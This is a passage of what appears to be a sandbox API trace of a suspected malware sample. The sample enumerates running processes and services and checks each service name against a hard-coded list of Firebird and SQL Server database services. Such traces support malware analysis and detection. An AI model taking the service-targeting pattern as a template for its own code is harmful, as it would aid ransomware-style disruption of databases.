dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.605] lstrlenW (lpString="svchost.exe") returned 11 [0195.605] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.606] lstrlenW (lpString="svchost.exe") returned 11 [0195.606] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.607] lstrlenW (lpString="svchost.exe") returned 11 [0195.607] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0195.608] lstrlenW (lpString="spoolsv.exe") returned 11 [0195.608] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.608] lstrlenW (lpString="svchost.exe") returned 11 [0195.608] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x4b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0195.609] lstrlenW (lpString="audiodg.exe") returned 11 [0195.609] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0195.610] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0195.610] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0195.611] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0195.611] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0195.612] lstrlenW (lpString="Memory Compression") returned 18 [0195.612] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0195.612] lstrlenW (lpString="sihost.exe") returned 10 [0195.613] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.613] lstrlenW (lpString="svchost.exe") returned 11 [0195.613] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3bc, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0195.614] lstrlenW (lpString="msoia.exe") returned 9 [0195.614] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0195.615] lstrlenW (lpString="taskhostw.exe") returned 13 [0195.615] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x9c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0195.616] lstrlenW (lpString="explorer.exe") returned 12 [0195.617] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0195.617] lstrlenW (lpString="SearchUI.exe") returned 12 [0195.617] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0195.618] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0195.618] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0195.619] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0195.619] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0195.620] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0195.620] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0195.621] lstrlenW (lpString="hgaibc.exe") returned 10 [0195.621] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 0 [0195.621] CloseHandle (hObject=0x358) returned 1 [0195.622] Sleep (dwMilliseconds=0x1f4) [0196.164] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x6bee58 [0196.165] EnumServicesStatusExW (in: hSCManager=0x6bee58, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0) returned 0 [0196.166] GetLastError () returned 0xea [0196.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1c30) returned 0x6d97a8 [0196.166] EnumServicesStatusExW (in: hSCManager=0x6bee58, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x6d97a8, cbBufSize=0x1c30, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x6d97a8, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0) returned 1 [0196.204] CloseServiceHandle (hSCObject=0x6bee58) returned 1 [0196.204] lstrlenW (lpString="Appinfo") returned 7 [0196.204] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0196.204] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0196.205] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0196.205] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0196.205] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0196.205] lstrlenW (lpString="AppXSvc") returned 7 [0196.205] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0196.205] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0196.205] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0196.205] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0196.205] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0196.205] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0196.205] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0196.205] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0196.205] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0196.206] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0196.206] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0196.206] lstrlenW (lpString="Audiosrv") returned 8 [0196.206] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0196.206] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0196.206] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0196.206] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0196.206] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0196.206] lstrlenW (lpString="BFE") returned 3 [0196.206] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0196.206] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0196.206] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0196.206] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0196.206] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0196.206] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0196.206] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0196.206] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0196.206] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0196.206] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0196.206] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0196.206] lstrlenW (lpString="CDPSvc") returned 6 [0196.207] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0196.207] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0196.207] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0196.207] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0196.207] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0196.207] lstrlenW (lpString="ClickToRunSvc") returned 13 [0196.207] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0196.207] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0196.207] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0196.207] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0196.207] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0196.207] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0196.207] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0196.207] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0196.207] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0196.207] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0196.207] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0196.207] lstrlenW (lpString="CryptSvc") returned 8 [0196.207] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0196.207] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0196.207] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0196.207] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0196.207] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0196.207] lstrlenW (lpString="DcomLaunch") returned 10 [0196.207] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0196.207] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0196.207] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0196.207] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0196.207] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0196.207] lstrlenW (lpString="DeviceAssociationService") returned 24 [0196.207] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0196.207] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0196.207] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0196.208] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0196.208] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0196.208] lstrlenW (lpString="Dhcp") returned 4 [0196.208] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0196.208] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0196.208] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0196.208] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0196.208] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0196.208] lstrlenW (lpString="Dnscache") returned 8 [0196.208] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0196.208] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0196.208] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0196.208] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0196.208] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0196.208] lstrlenW (lpString="DPS") returned 3 [0196.208] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0196.208] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0196.208] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0196.208] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0196.208] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0196.208] lstrlenW (lpString="DusmSvc") returned 7 [0196.208] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0196.208] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0196.208] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0196.208] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0196.208] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0196.208] lstrlenW (lpString="EventLog") returned 8 [0196.208] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0196.208] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0196.208] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0196.208] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0196.208] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0196.208] lstrlenW (lpString="EventSystem") returned 11 [0196.208] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0196.209] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0196.209] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0196.209] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0196.209] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0196.209] lstrlenW (lpString="FontCache") returned 9 [0196.209] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0196.209] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0196.209] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0196.209] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0196.209] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0196.209] lstrlenW (lpString="gpsvc") returned 5 [0196.209] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0196.209] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0196.209] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0196.209] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0196.209] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0196.209] lstrlenW (lpString="iphlpsvc") returned 8 [0196.209] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0196.209] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0196.209] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0196.209] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0196.209] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0196.209] lstrlenW (lpString="KeyIso") returned 6 [0196.209] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0196.209] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0196.209] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0196.209] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0196.209] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0196.209] lstrlenW (lpString="LanmanServer") returned 12 [0196.209] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0196.209] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0196.209] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0196.209] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0196.210] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0196.210] lstrlenW (lpString="LanmanWorkstation") returned 17 [0196.210] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0196.210] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0196.210] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0196.210] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0196.210] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0196.210] lstrlenW (lpString="lfsvc") returned 5 [0196.210] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0196.210] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0196.210] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0196.210] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0196.210] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0196.210] lstrlenW (lpString="lmhosts") returned 7 [0196.210] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0196.210] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0196.210] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0196.210] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0196.210] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0196.210] lstrlenW (lpString="LSM") returned 3 [0196.210] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0196.210] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0196.210] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0196.210] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0196.210] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0196.210] lstrlenW (lpString="MpsSvc") returned 6 [0196.210] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0196.210] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0196.210] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0196.210] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0196.210] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0196.210] lstrlenW (lpString="NcbService") returned 10 [0196.210] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0196.210] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0196.210] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0196.211] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0196.211] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0196.211] lstrlenW (lpString="netprofm") returned 8 [0196.211] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0196.211] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0196.211] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0196.211] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0196.211] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0196.211] lstrlenW (lpString="NgcSvc") returned 6 [0196.211] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0196.211] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0196.211] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0196.211] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0196.211] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0196.211] lstrlenW (lpString="NlaSvc") returned 6 [0196.211] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0196.211] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0196.211] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0196.211] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0196.211] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0196.211] lstrlenW (lpString="nsi") returned 3 [0196.211] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0196.211] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0196.211] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0196.211] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0196.211] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0196.211] lstrlenW (lpString="PcaSvc") returned 6 [0196.211] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0196.211] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0196.211] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0196.211] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0196.211] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0196.211] lstrlenW (lpString="PlugPlay") returned 8 [0196.212] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0196.212] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0196.212] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0196.212] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0196.212] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0196.212] lstrlenW (lpString="Power") returned 5 [0196.212] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0196.212] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0196.212] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0196.212] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0196.212] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0196.212] lstrlenW (lpString="ProfSvc") returned 7 [0196.212] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0196.212] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0196.212] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0196.212] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0196.212] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0196.212] lstrlenW (lpString="RpcEptMapper") returned 12 [0196.212] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0196.212] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0196.212] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0196.212] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0196.212] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0196.212] lstrlenW (lpString="RpcSs") returned 5 [0196.212] lstrcmpiW 